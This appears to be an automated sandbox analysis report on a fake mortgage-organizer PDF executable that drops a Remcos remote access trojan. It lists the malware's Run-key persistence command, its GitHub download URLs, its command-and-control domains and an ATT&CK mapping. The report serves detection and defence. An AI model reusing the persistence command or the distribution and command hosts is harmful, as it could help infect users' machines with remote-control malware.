Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe	Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

File created: C:\Users\user\AppData\Local\Temp\build.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\SysWOW64\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *UpdaterCisco

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *UpdaterCisco			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *UpdaterCisco			Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000E23000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"

Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f			Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2423957132.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 6148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 5652, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-9QRTYQ			Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-9QRTYQ			Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2423957132.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 6148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 5652, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	111 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	111 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://maveuve.github.io/frlpodf/marynewreleasefax.html	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
http://www.openssl.org/support/faq.html	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
https://getbootstrap.com/)	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7bc1cab943c1&lang=auto	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js	0%	Avira URL Cloud	safe
http://www.zeniko.ch/#SumatraPDFSimon	0%	Avira URL Cloud	safe
https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css	0%	Avira URL Cloud	safe
http://HDMHDMLoading...%s	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7ad8c96941a6&lang=auto	0%	Avira URL Cloud	safe
http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c	0%	Avira URL Cloud	safe
http://itexmac.sourceforge.net/SyncTeX.htmlJ	0%	Avira URL Cloud	safe
http://www.symantec.com/XMLSchema/dcs/disc-protection	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8c8c7bc1cab943c1/1727282716834/454bfa27911b53eaf89b77fb676ac9ea7d67d7c4009c0340595e1039d45fc476/ANn6E4_AEvWbw_F	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/	0%	Avira URL Cloud	safe
http://www.haihaisoft.com/Contact.aspx	0%	Avira URL Cloud	safe
http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag	0%	Avira URL Cloud	safe
http://www.freetype.org/FreeTypefont	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed	0%	Avira URL Cloud	safe
http://p.yusukekamiyamane.com/Yusuke	0%	Avira URL Cloud	safe
http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS	0%	Avira URL Cloud	safe
privmerkt.com	100%	Avira URL Cloud	malware
https://challenges.cloudflare.com/turnstile/v0/api.js?compat=recaptcha	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/	0%	Avira URL Cloud	safe
http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD	0%	Avira URL Cloud	safe
https://githubstatus.com	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpV	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpT	0%	Avira URL Cloud	safe
http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware	0%	Avira URL Cloud	safe
http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/784762221:1727280895:DpZwutPQnAJ2xMIFwpiobNTMBlYJp9CWXlp9V5GN5Yo/8c8c7bc1cab943c1/4904f693d598ee1	0%	Avira URL Cloud	safe
http://blog.kowalczyk.infoKrzysztof	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
http://www.haihaisoft.comSumatraPDF	0%	Avira URL Cloud	safe
http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe	0%	Avira URL Cloud	safe
https://twitter.com/githubstatus	0%	Avira URL Cloud	safe
http://www.flashvidz.tk/Zenonprogram	0%	Avira URL Cloud	safe
http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo	0%	Avira URL Cloud	safe
http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpn	0%	Avira URL Cloud	safe
http://www.symantec.com/XMLSchema/dcs/disc-results	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd	0%	Avira URL Cloud	safe
http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute	0%	Avira URL Cloud	safe
http://geoplugin.net/	0%	Avira URL Cloud	safe
http://www.openssl.org/support/faq.html....................	0%	Avira URL Cloud	safe
http://william.famille-blum.org/William	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDllbad	0%	Avira URL Cloud	safe
http://mupdf.comMuPDFpdf	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0Digitized	0%	Avira URL Cloud	safe
https://maveuve.github.io/favicon.ico	0%	Avira URL Cloud	safe
https://github.com/maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip	0%	Avira URL Cloud	safe
https://github.com/twbs/bootstrap/blob/master/LICENSE)	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDll	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8c8c7bc1cab943c1/1727282716836/wNiz968zyhOEG8-	0%	Avira URL Cloud	safe
https://help.github.com/pages/	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8c8c7ad8c96941a6/1727282678369/d41a30965b817c48f2b8012ecc5d4118160944ab876415a0adeddf7d6fb64e62/cwl0dNi4gO4wp8F	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
stackpath.bootstrapcdn.com	104.18.10.207	true	false	unknown
privmerkt.com	172.111.163.227	true	true	unknown
github.com	140.82.121.4	true	false	unknown
nwemarkets.com	45.74.48.2	true	true	unknown
challenges.cloudflare.com	104.18.95.41	true	false	unknown
raw.githubusercontent.com	185.199.111.133	true	false	unknown
geoplugin.net	178.237.33.50	true	false	unknown
www.google.com	142.250.186.68	true	false	unknown
maveuve.github.io	185.199.108.153	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7bc1cab943c1&lang=auto	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7ad8c96941a6&lang=auto	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip	false	Avira URL Cloud: safe	unknown
https://maveuve.github.io/frlpodf/marynewreleasefax.html	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8c8c7bc1cab943c1/1727282716834/454bfa27911b53eaf89b77fb676ac9ea7d67d7c4009c0340595e1039d45fc476/ANn6E4_AEvWbw_F	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/	false	Avira URL Cloud: safe	unknown
privmerkt.com	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?compat=recaptcha	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/784762221:1727280895:DpZwutPQnAJ2xMIFwpiobNTMBlYJp9CWXlp9V5GN5Yo/8c8c7bc1cab943c1/4904f693d598ee1	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
https://maveuve.github.io/favicon.ico	false	Avira URL Cloud: safe	unknown
https://github.com/maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8c8c7bc1cab943c1/1727282716836/wNiz968zyhOEG8-	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8c8c7ad8c96941a6/1727282678369/d41a30965b817c48f2b8012ecc5d4118160944ab876415a0adeddf7d6fb64e62/cwl0dNi4gO4wp8F	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.zeniko.ch/#SumatraPDFSimon	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symantec.com/XMLSchema/dcs/disc-protection	build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://itexmac.sourceforge.net/SyncTeX.htmlJ	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://HDMHDMLoading...%s	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://p.yusukekamiyamane.com/Yusuke	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haihaisoft.com/Contact.aspx	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.freetype.org/FreeTypefont	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpT	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpV	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000DF6000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://githubstatus.com	chromecache_74.1.dr	false	Avira URL Cloud: safe	unknown
http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.kowalczyk.infoKrzysztof	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haihaisoft.comSumatraPDF	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
